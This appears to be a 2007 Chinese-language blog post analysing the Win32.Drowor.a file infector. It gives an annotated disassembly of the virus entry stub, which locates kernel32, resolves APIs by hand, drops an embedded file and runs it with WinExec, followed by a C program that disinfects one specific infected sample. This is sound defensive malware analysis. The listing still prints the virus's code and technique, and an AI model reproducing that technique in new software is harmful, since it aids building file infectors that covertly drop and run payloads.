2007年4月21日星期六

Win32.Drowor.a 的分析过程和清除手段

************************************************************************************
以下为分析过程（病毒入口代码的 OllyDbg 风格反汇编，宿主映像基址为 0x400000；以 //// 开头的行是分析注释，其余行为指令）
************************************************************************************
//// Entry stub of Win32.Drowor.a as it sits in the infected host (OllyDbg listing; the host is
//// loaded at image base 0x400000). The stub locates kernel32 and GetProcAddress by hand,
//// resolves a dozen APIs, drops and runs an embedded file, then jumps to the host's original
//// entry point. ESI -> [EBP-4] (kernel32 base); [EBP-C] = base of the appended virus section,
//// which every [EBX+off] access below is relative to.
00436716 > 55 PUSH EBP
00436717 8BEC MOV EBP,ESP
00436719 83C4 D0 ADD ESP,-30
0043671C 53 PUSH EBX
0043671D 56 PUSH ESI
0043671E 57 PUSH EDI
0043671F 8D75 FC LEA ESI,DWORD PTR SS:[EBP-4]
//// Seed for the kernel32 search. With EBP = entry ESP-4 and ESP = entry ESP-0x40, [ESP+30] is
//// the same slot as [EBP-C], which has not been written yet: the stub relies on a stale
//// kernel32 pointer being left in that stack slot before the entry point was reached
//// (presumably by the loader -- verify on the target OS).
00436722 8B4424 30 MOV EAX,DWORD PTR SS:[ESP+30]
00436726 25 0000FFFF AND EAX,FFFF0000
//// Round down to 64K, then walk back one page (0x1000) at a time until the first dword of the
//// page is "MZ\x90\0" (0x00905A4D = e_magic 0x5A4D followed by e_cblp 0x0090); that page is
//// taken as the kernel32 base. There is no lower bound, so a bad seed walks into unmapped
//// memory and the host faults.
0043672B 8138 4D5A9000 CMP DWORD PTR DS:[EAX],905A4D
00436731 74 07 JE SHORT v.0043673A
00436733 2D 00100000 SUB EAX,1000
00436738 ^ EB F1 JMP SHORT v.0043672B
0043673A 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
//// The callee at 0043670A is not in this listing. For the arithmetic below to work it has to
//// return EAX = 0043670A itself (e.g. a call/pop "get my address" helper), because
//// 0043670A - 770A = 0042F000 = image base 0x400000 + the host's original SizeOfImage 0x2F000,
//// i.e. the start of the appended virus section (the cleaner below restores that same
//// SizeOfImage). That base is kept in [EBP-C].
0043673D E8 C8FFFFFF CALL v.0043670A
00436742 2D 0A770000 SUB EAX,770A
00436747 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX
//// kernel32 PE header: base + e_lfanew (DOS header +3C).
0043674A 8B06 MOV EAX,DWORD PTR DS:[ESI]
0043674C 8B40 3C MOV EAX,DWORD PTR DS:[EAX+3C]
0043674F 0306 ADD EAX,DWORD PTR DS:[ESI]
//// IMAGE_NT_HEADERS32 +78 = DataDirectory[0].VirtualAddress, the export directory RVA;
//// rebase it and keep the IMAGE_EXPORT_DIRECTORY pointer in ECX.
00436751 8B40 78 MOV EAX,DWORD PTR DS:[EAX+78]
00436754 0306 ADD EAX,DWORD PTR DS:[ESI]
00436756 8BC8 MOV ECX,EAX
//// +20 AddressOfNames (array of name RVAs) -> EDX
00436758 8B51 20 MOV EDX,DWORD PTR DS:[ECX+20]
0043675B 0316 ADD EDX,DWORD PTR DS:[ESI]
//// +24 AddressOfNameOrdinals (array of WORDs) -> [EBP-10]
0043675D 8B59 24 MOV EBX,DWORD PTR DS:[ECX+24]
00436760 031E ADD EBX,DWORD PTR DS:[ESI]
00436762 895D F0 MOV DWORD PTR SS:[EBP-10],EBX
//// +1C AddressOfFunctions (array of function RVAs) -> [EBP-14]
00436765 8B59 1C MOV EBX,DWORD PTR DS:[ECX+1C]
00436768 031E ADD EBX,DWORD PTR DS:[ESI]
0043676A 895D EC MOV DWORD PTR SS:[EBP-14],EBX
//// +18 NumberOfNames -> EAX, the loop bound
0043676D 8B41 18 MOV EAX,DWORD PTR DS:[ECX+18]
//// Linear scan of the export name table for "GetProcAddress"; ECX counts down, EAX is the
//// index. NOTE: TEST always clears CF, so the JB below is dead code -- a NumberOfNames of 0
//// would wrap ECX to 0xFFFFFFFF instead of skipping the loop.
00436770 8BC8 MOV ECX,EAX
00436772 49 DEC ECX
00436773 85C9 TEST ECX,ECX
00436775 72 5A JB SHORT v.004367D1
00436777 41 INC ECX
00436778 33C0 XOR EAX,EAX
//// EDI = base + AddressOfNames[EAX]; the 14-byte name is compared in four pieces:
//// "GetP" 50746547, "rocA" 41636F72, "ddre" 65726464, "ss" 7373. The terminating NUL is not
//// compared, so any export whose name merely starts with "GetProcAddress" would also match;
//// the name table is sorted, so the exact name is reached first.
0043677A 8BD8 MOV EBX,EAX
0043677C C1E3 02 SHL EBX,2
0043677F 03DA ADD EBX,EDX
00436781 8B3B MOV EDI,DWORD PTR DS:[EBX]
00436783 033E ADD EDI,DWORD PTR DS:[ESI]
00436785 813F 47657450 CMP DWORD PTR DS:[EDI],50746547
0043678B 75 40 JNZ SHORT v.004367CD
0043678D 8BDF MOV EBX,EDI
0043678F 83C3 04 ADD EBX,4
00436792 813B 726F6341 CMP DWORD PTR DS:[EBX],41636F72
00436798 75 33 JNZ SHORT v.004367CD
0043679A 8BDF MOV EBX,EDI
0043679C 83C3 08 ADD EBX,8
0043679F 813B 64647265 CMP DWORD PTR DS:[EBX],65726464
004367A5 75 26 JNZ SHORT v.004367CD
004367A7 83C7 0C ADD EDI,0C
004367AA 66:813F 7373 CMP WORD PTR DS:[EDI],7373
004367AF 75 1C JNZ SHORT v.004367CD
//// Match: ordinal = AddressOfNameOrdinals[EAX] (WORD), RVA = AddressOfFunctions[ordinal],
//// rebased with the kernel32 base and stored at [virus_base+4] -- the slot every later
//// CALL DWORD PTR [EBX+4] (GetProcAddress) goes through.
004367B1 8BD0 MOV EDX,EAX
004367B3 03D2 ADD EDX,EDX
004367B5 0355 F0 ADD EDX,DWORD PTR SS:[EBP-10]
004367B8 0FB712 MOVZX EDX,WORD PTR DS:[EDX]
004367BB C1E2 02 SHL EDX,2
004367BE 0355 EC ADD EDX,DWORD PTR SS:[EBP-14]
004367C1 8B12 MOV EDX,DWORD PTR DS:[EDX]
004367C3 0316 ADD EDX,DWORD PTR DS:[ESI]
004367C5 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
004367C8 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
004367CB EB 04 JMP SHORT v.004367D1
//// No match: next name until the count is exhausted (then [virus_base+4] is never set and the
//// first CALL [EBX+4] below jumps through whatever that slot already held).
004367CD 40 INC EAX
004367CE 49 DEC ECX
004367CF ^ 75 A9 JNZ SHORT v.0043677A

//// EBX = virus section base. Resolve the remaining APIs via GetProcAddress ([EBX+4]).
//// The name strings are not shown, but the offsets used below are spaced exactly like the
//// NUL-terminated names given in the original analysis (e.g. +3B..+48 is 13 bytes, the length
//// of "LoadLibraryA\0"), so the slots are, in resolution order:
////   [EBX+8]  <- kernel32 +3B   LoadLibraryA
////   [EBX+C]  <- kernel32 +48   FreeLibrary        (resolved, never called in this listing)
////   [EBX+10] <- kernel32 +54   ExitProcess        (resolved, never called in this listing)
////   [EBX+18] <- kernel32 +60   GetModuleHandleA   (resolved, never called in this listing)
////   [EBX]    <- LoadLibraryA(+34): user32 handle (+34..+3B is 7 bytes, e.g. "user32\0")
////   [EBX+1C] <- user32   +71   GetMessageA        (resolved, never called in this listing)
////   [EBX+20] <- user32   +7D   TranslateMessage   (resolved, never called in this listing)
////   [EBX+24] <- user32   +8E   DispatchMessageA   (resolved, never called in this listing)
////   [EBX+14] <- kernel32 +9F   WinExec
////   [EBX+28] <- kernel32 +1A7  CreateFileA
////   [EBX+2C] <- kernel32 +1B3  WriteFile
////   [EBX+30] <- kernel32 +1BD  CloseHandle
//// None of the returned pointers is NULL-checked before it is called.
004367D1 8B5D F4 MOV EBX,DWORD PTR SS:[EBP-C]
004367D4 8D43 3B LEA EAX,DWORD PTR DS:[EBX+3B]
004367D7 50 PUSH EAX
004367D8 8B06 MOV EAX,DWORD PTR DS:[ESI]
004367DA 50 PUSH EAX
004367DB FF53 04 CALL DWORD PTR DS:[EBX+4]
004367DE 8943 08 MOV DWORD PTR DS:[EBX+8],EAX
004367E1 8D43 48 LEA EAX,DWORD PTR DS:[EBX+48]
004367E4 50 PUSH EAX
004367E5 8B06 MOV EAX,DWORD PTR DS:[ESI]
004367E7 50 PUSH EAX
004367E8 FF53 04 CALL DWORD PTR DS:[EBX+4]
004367EB 8943 0C MOV DWORD PTR DS:[EBX+C],EAX
004367EE 8D43 54 LEA EAX,DWORD PTR DS:[EBX+54]
004367F1 50 PUSH EAX
004367F2 8B06 MOV EAX,DWORD PTR DS:[ESI]
004367F4 50 PUSH EAX
004367F5 FF53 04 CALL DWORD PTR DS:[EBX+4]
004367F8 8943 10 MOV DWORD PTR DS:[EBX+10],EAX
004367FB 8D43 60 LEA EAX,DWORD PTR DS:[EBX+60]
004367FE 50 PUSH EAX
004367FF 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436801 50 PUSH EAX
00436802 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436805 8943 18 MOV DWORD PTR DS:[EBX+18],EAX
//// One-argument call through [EBX+8] (LoadLibraryA) with the string at +34; the result is the
//// user32 module handle, kept in EDI and at [EBX].
00436808 8D43 34 LEA EAX,DWORD PTR DS:[EBX+34]
0043680B 50 PUSH EAX
0043680C FF53 08 CALL DWORD PTR DS:[EBX+8]
0043680F 8BF8 MOV EDI,EAX
00436811 893B MOV DWORD PTR DS:[EBX],EDI
//// user32 exports, looked up through the handle at [EBX].
00436813 8D43 71 LEA EAX,DWORD PTR DS:[EBX+71]
00436816 50 PUSH EAX
00436817 57 PUSH EDI
00436818 FF53 04 CALL DWORD PTR DS:[EBX+4]
0043681B 8943 1C MOV DWORD PTR DS:[EBX+1C],EAX
0043681E 8D43 7D LEA EAX,DWORD PTR DS:[EBX+7D]
00436821 50 PUSH EAX
00436822 8B03 MOV EAX,DWORD PTR DS:[EBX]
00436824 50 PUSH EAX
00436825 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436828 8943 20 MOV DWORD PTR DS:[EBX+20],EAX
0043682B 8D83 8E000000 LEA EAX,DWORD PTR DS:[EBX+8E]
00436831 50 PUSH EAX
00436832 8B03 MOV EAX,DWORD PTR DS:[EBX]
00436834 50 PUSH EAX
00436835 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436838 8943 24 MOV DWORD PTR DS:[EBX+24],EAX
//// Back to kernel32 (handle at [ESI]) for the file-drop and execution APIs.
0043683B 8D83 9F000000 LEA EAX,DWORD PTR DS:[EBX+9F]
00436841 50 PUSH EAX
00436842 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436844 50 PUSH EAX
00436845 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436848 8943 14 MOV DWORD PTR DS:[EBX+14],EAX
0043684B 8D83 A7010000 LEA EAX,DWORD PTR DS:[EBX+1A7]
00436851 50 PUSH EAX
00436852 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436854 50 PUSH EAX
00436855 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436858 8943 28 MOV DWORD PTR DS:[EBX+28],EAX
0043685B 8D83 B3010000 LEA EAX,DWORD PTR DS:[EBX+1B3]
00436861 50 PUSH EAX
00436862 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436864 50 PUSH EAX
00436865 FF53 04 CALL DWORD PTR DS:[EBX+4]
00436868 8943 2C MOV DWORD PTR DS:[EBX+2C],EAX
0043686B 8D83 BD010000 LEA EAX,DWORD PTR DS:[EBX+1BD]
00436871 50 PUSH EAX
00436872 8B06 MOV EAX,DWORD PTR DS:[ESI]
00436874 50 PUSH EAX
00436875 FF53 04 CALL DWORD PTR DS:[EBX+4]
//// CloseHandle -> [EBX+30]
00436878 8943 30 MOV DWORD PTR DS:[EBX+30],EAX
//// CreateFileA(lpFileName=[EBX+A7] -- the drop path, "C:\_.de" per the original analysis --,
////   dwDesiredAccess=C0000000 GENERIC_READ|GENERIC_WRITE, dwShareMode=1 FILE_SHARE_READ,
////   lpSecurityAttributes=0, dwCreationDisposition=2 CREATE_ALWAYS (an existing file is
////   overwritten), dwFlagsAndAttributes=0, hTemplateFile=0); arguments are pushed right to left.
0043687B 6A 00 PUSH 0
0043687D 6A 00 PUSH 0
0043687F 6A 02 PUSH 2
00436881 6A 00 PUSH 0
00436883 6A 01 PUSH 1
00436885 68 000000C0 PUSH C0000000
0043688A 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7]
00436890 50 PUSH EAX
00436891 FF53 28 CALL DWORD PTR DS:[EBX+28]
//// Keep the handle at [EBX+76FA] (the virus writes into its own section, so that section must
//// be mapped writable), then WriteFile(hFile, lpBuffer=[EBX+1C9], nBytes=7531 (30001),
//// lpNumberOfBytesWritten=[EBX+76FE], lpOverlapped=0): the dropped file's contents are carried
//// inline at +1C9 (with EBX = 0042F000 the count slot is 004366FE, as the original analysis
//// states). Neither INVALID_HANDLE_VALUE nor WriteFile's result is checked.
00436894 8BF0 MOV ESI,EAX
00436896 89B3 FA760000 MOV DWORD PTR DS:[EBX+76FA],ESI
0043689C 6A 00 PUSH 0
0043689E 8D83 FE760000 LEA EAX,DWORD PTR DS:[EBX+76FE]
004368A4 50 PUSH EAX
004368A5 68 31750000 PUSH 7531
004368AA 8D83 C9010000 LEA EAX,DWORD PTR DS:[EBX+1C9]
004368B0 50 PUSH EAX
004368B1 56 PUSH ESI
004368B2 FF53 2C CALL DWORD PTR DS:[EBX+2C]
//// CloseHandle([EBX+76FA])
004368B5 8B83 FA760000 MOV EAX,DWORD PTR DS:[EBX+76FA]
004368BB 50 PUSH EAX
004368BC FF53 30 CALL DWORD PTR DS:[EBX+30]
//// WinExec(lpCmdLine=[EBX+A7] (same drop path), uCmdShow=1 SW_SHOWNORMAL). The dropped file is
//// never deleted afterwards, so its presence on disk is a usable indicator of compromise.
004368BF 6A 01 PUSH 1
004368C1 8D83 A7000000 LEA EAX,DWORD PTR DS:[EBX+A7]
004368C7 50 PUSH EAX
004368C8 FF53 14 CALL DWORD PTR DS:[EBX+14]
//// Hand over to the host: original entry = [EBX+7702] + [EBX+7706], the two values the virus
//// saved at infection time (original AddressOfEntryPoint RVA and image base; the cleaner below
//// restores the RVA as 0x10AA8 -- which slot holds which is not visible here). Nothing pushed
//// above is popped first, so the host's entry code runs with this 0x40-byte frame still on
//// the stack.
004368CB 8B83 02770000 MOV EAX,DWORD PTR DS:[EBX+7702]
004368D1 0383 06770000 ADD EAX,DWORD PTR DS:[EBX+7706]
004368D7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
004368DA 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
004368DD FFE0 JMP EAX
****************************************************************************************
下边为清除病毒的代码（注意：其中的入口地址 0x10AA8、映像大小 0x2F000 和截断长度 0x2AFFF 都是针对本文分析的这一个宿主样本硬编码的，并非从文件中读取；用于其它被感染文件前必须重新确定这些值）
****************************************************************************************
//Coded by Santiago
#include <stdio.h>
#include <windows.h>

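/*
 * Disinfect one host file infected by Win32.Drowor.a (usage: <program> <infected-file>).
 *
 * The virus appends one section, points AddressOfEntryPoint into it and enlarges
 * SizeOfImage; the host's original entry is reached again through the two values the
 * stub adds together at 004368CB/004368D1 in the listing above. Cleaning therefore means:
 * put the original entry RVA back, restore SizeOfImage, drop the appended section header
 * and cut the file back to its original length.
 *
 * CAUTION: the three constants below were recovered for the one sample analysed above and
 * are NOT read from the file, so this program must only be run against hosts known to be
 * that sample. A general cleaner would derive the original SizeOfImage from the appended
 * section's VirtualAddress, the original file length from its PointerToRawData, and the
 * entry RVA from the pair of values stored at section offsets 0x7702/0x7706 (see listing).
 *
 * Returns 0 on success, -1 on any failure (a message is printed first). Nothing is written
 * until every check has passed; if only the final truncation fails, the headers are already
 * repaired (the virus no longer runs) but the appended bytes are still in the file.
 */
#define DROWOR_ORIG_ENTRY_RVA     0x10AA8  /* host AddressOfEntryPoint before infection */
#define DROWOR_ORIG_SIZE_OF_IMAGE 0x2F000  /* host SizeOfImage before infection */
#define DROWOR_ORIG_FILE_LENGTH   0x2AFFF  /* length the file is cut back to */

int main(int argc, char *argv[])
{
    HANDLE hFile = INVALID_HANDLE_VALUE;
    HANDLE hMapping = NULL;
    LPVOID lpMapping = NULL;
    PIMAGE_DOS_HEADER pDos_Header;
    PIMAGE_NT_HEADERS32 pNT_Headers;
    PIMAGE_SECTION_HEADER pSections;
    PIMAGE_SECTION_HEADER pVirusSection;
    DWORD dwFileSize;
    DWORD dwSectionTableOffset;
    DWORD dwSectionCount;
    DWORD dwEntry;
    DWORD dwVirusVA;
    DWORD dwVirusSize;
    int rc = -1;

    if (argc < 2 || argv[1] == NULL) {
        printf("usage: drowor_clean <infected-file>\n");
        return -1;
    }

    /* Exclusive access (share mode 0): nothing else may write the file while it is rewritten. */
    hFile = CreateFile(argv[1], GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL, 0);
    /* CreateFile signals failure with INVALID_HANDLE_VALUE, never NULL; the original
     * `if(!hFile)` could not fire and handed the bad handle on to CreateFileMapping. */
    if (hFile == INVALID_HANDLE_VALUE) {
        printf("Can not open the file!\n");
        return -1;
    }

    dwFileSize = GetFileSize(hFile, NULL);
    if (dwFileSize == INVALID_FILE_SIZE || dwFileSize <= DROWOR_ORIG_FILE_LENGTH) {
        printf("File is not longer than the expected clean length, nothing to cut!\n");
        goto out;
    }

    hMapping = CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL);
    if (hMapping == NULL) {
        printf("can not open the file mapping!\n");
        goto out;
    }
    lpMapping = MapViewOfFile(hMapping, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
    if (lpMapping == NULL) {
        printf("can not map a view of a file!\n");
        goto out;
    }

    /* Header validation: every offset taken from the file is bounds-checked against the
     * mapped size before it is dereferenced, so a non-PE or truncated input cannot make this
     * program read or write outside the view. */
    pDos_Header = (PIMAGE_DOS_HEADER)lpMapping;
    if (pDos_Header->e_magic != IMAGE_DOS_SIGNATURE
        || pDos_Header->e_lfanew < 0
        || (DWORD)pDos_Header->e_lfanew > dwFileSize - sizeof(IMAGE_NT_HEADERS32)) {
        printf("Not a PE file!\n");
        goto out;
    }
    /* BYTE* arithmetic instead of the original (DWORD)lpMapping cast, which truncates the
     * pointer on 64-bit builds. */
    pNT_Headers = (PIMAGE_NT_HEADERS32)((BYTE *)lpMapping + pDos_Header->e_lfanew);
    dwSectionCount = pNT_Headers->FileHeader.NumberOfSections;
    if (pNT_Headers->Signature != IMAGE_NT_SIGNATURE
        || pNT_Headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC
        || dwSectionCount == 0) {
        printf("Not a 32-bit PE file with a section table!\n");
        goto out;
    }
    pSections = IMAGE_FIRST_SECTION(pNT_Headers);
    dwSectionTableOffset = (DWORD)((BYTE *)pSections - (BYTE *)lpMapping);
    if (dwSectionTableOffset > dwFileSize
        || dwSectionCount * sizeof(IMAGE_SECTION_HEADER) > dwFileSize - dwSectionTableOffset) {
        printf("Section table runs past the end of the file!\n");
        goto out;
    }

    /* Infection check: the virus lives in the last section, which must start exactly where
     * the original image ended (its VirtualAddress == the original SizeOfImage), and the
     * entry point must currently point into it. A clean file, or a different sample, is
     * refused here instead of being corrupted by the hard-coded values. */
    pVirusSection = &pSections[dwSectionCount - 1];
    dwVirusVA = pVirusSection->VirtualAddress;
    dwVirusSize = pVirusSection->Misc.VirtualSize;
    if (dwVirusSize < pVirusSection->SizeOfRawData) {
        dwVirusSize = pVirusSection->SizeOfRawData;
    }
    dwEntry = pNT_Headers->OptionalHeader.AddressOfEntryPoint;
    if (dwVirusVA != DROWOR_ORIG_SIZE_OF_IMAGE
        || dwEntry < dwVirusVA
        || dwEntry - dwVirusVA >= dwVirusSize) {
        printf("File does not look like the analysed Win32.Drowor.a host, not touched!\n");
        goto out;
    }

    /* Repair the headers through the mapping: original entry, original image size, one
     * section fewer, and the stale section header wiped so no tool still sees the virus
     * section's address range. */
    pNT_Headers->OptionalHeader.AddressOfEntryPoint = DROWOR_ORIG_ENTRY_RVA;
    pNT_Headers->OptionalHeader.SizeOfImage = DROWOR_ORIG_SIZE_OF_IMAGE;
    pNT_Headers->FileHeader.NumberOfSections = (WORD)(dwSectionCount - 1);
    ZeroMemory(pVirusSection, sizeof(*pVirusSection));
    FlushViewOfFile(lpMapping, 0);

    /* SetEndOfFile fails (ERROR_USER_MAPPED_FILE) while any view of the file is mapped, so the
     * view and the mapping object are released before truncating. The original order --
     * truncate first, unmap afterwards, return value unchecked -- would leave the virus body
     * appended to the file. */
    UnmapViewOfFile(lpMapping);
    lpMapping = NULL;
    CloseHandle(hMapping);
    hMapping = NULL;

    if (SetFilePointer(hFile, DROWOR_ORIG_FILE_LENGTH, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER
        || !SetEndOfFile(hFile)) {
        printf("Headers repaired but the virus body could not be cut off (error %lu)!\n",
               (unsigned long)GetLastError());
        goto out;
    }
    rc = 0;

out:
    if (lpMapping != NULL) {
        UnmapViewOfFile(lpMapping);
    }
    if (hMapping != NULL) {
        CloseHandle(hMapping);
    }
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
    }
    return rc;
}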
